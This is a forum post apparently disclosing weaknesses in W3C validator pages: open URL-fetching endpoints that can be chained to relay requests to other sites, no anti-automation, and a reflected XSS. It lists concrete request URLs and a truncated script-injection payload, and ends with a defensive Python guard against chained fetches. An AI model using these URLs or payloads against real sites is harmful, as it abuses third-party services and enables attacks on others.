New vulnerabilities at www.w3.org
These are Abuse of Functionality, Insufficient Anti-automation and Cross-Site Scripting vulnerabilities in http://www.w3.org, the website of the World Wide Web Consortium (W3C). I will soon tell the website administrator about them.
In total, the following W3C validators are vulnerable:
http://www.w3.org/2003/12/semantic-extractor.html
http://www.w3.org/services/tidy
http://validator.w3.org/mobile/
http://www.w3.org/P3P/validator
Abuse of Functionality:
- Code:
http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http%3A%2F%2Fwww.w3.org%2Fservices%2Ftidy%3FpassThroughXHTML%3D1%26docAddr%3Dhttp%253A%252F%252Fgoogle.com&xslfile=http%3A%2F%2Fwww.w3.org%2F2002%2F08%2Fextract-semantic.xsl
http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http://google.com&xslfile=http%3A%2F%2Fwww.w3.org%2F2002%2F08%2Fextract-semantic.xsl
http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http%3A%2F%2Fwww.w3.org%2Fservices%2Ftidy%3FpassThroughXHTML%3D1%26docAddr%3Dhttp%253A%252F%252Fgoogle.com&xslfile=http://google.com
http://www.w3.org/services/tidy?docAddr=http://google.com
http://validator.w3.org/mobile/check?docAddr=http://google.com
http://validator.w3.org/p3p/20020128/p3p.pl?uri=http://google.com
http://validator.w3.org/p3p/20020128/policy.pl?uri=http://google.com
This functionality of the sites can be used for CSRF attacks on other sites.
Insufficient Anti-automation:
These pages have no protection against automated searches (captcha), which makes it possible to automate CSRF attacks on other sites.
XSS:
[url=http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=&xslfile=%3Cscript%3Ealert(document
andry- Moderator
- Posts : 467
Join date : 2010-05-07
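A defender-side sketch for the two weaknesses the post describes (fetch-by-URL validators that can be chained through each other, and no limit on automated requests). This is an added example, not part of the original post and not W3C's code; `FetchGuard`, `OWN_HOSTS` and the limits are assumed names and values.

```python
import time
from urllib.parse import urlsplit, parse_qsl

# Assumed for illustration: hosts of the fetching service itself, and limits.
OWN_HOSTS = {"www.w3.org", "validator.w3.org"}
MAX_PER_TARGET = 5       # fetches allowed per client and target host per window
WINDOW_SECONDS = 60


def _carries_url(query):
    # parse_qsl percent-decodes each value once, as the service itself would.
    return any(v.lower().startswith(("http://", "https://"))
               for _, v in parse_qsl(query))


class FetchGuard:
    """Decides whether a validator may fetch the document a client asked for."""

    def __init__(self, clock=time.monotonic):
        self.clock = clock
        self.hits = {}   # (client, target host) -> timestamps of recent fetches

    def check(self, client_ip, doc_addr):
        """Return (allowed, reason) for a request to fetch doc_addr."""
        try:
            parts = urlsplit(doc_addr)
            host = (parts.hostname or "").lower()
        except ValueError:
            return False, "unsupported-url"
        if parts.scheme not in ("http", "https") or not host:
            return False, "unsupported-url"
        # Refuse chaining: the target is one of our own fetchers and its query
        # carries yet another URL to retrieve.
        if host in OWN_HOSTS and _carries_url(parts.query):
            return False, "chained-fetch"
        # Sliding-window limit per client and target host.
        now = self.clock()
        key = (client_ip, host)
        recent = [t for t in self.hits.get(key, []) if now - t < WINDOW_SECONDS]
        allowed = len(recent) < MAX_PER_TARGET
        if allowed:
            recent.append(now)
        self.hits[key] = recent
        return (True, "ok") if allowed else (False, "rate-limited")
```

The guard would run before the service performs the outbound request, with `doc_addr` being the already-decoded `docAddr`, `uri`, `xmlfile` or `xslfile` value.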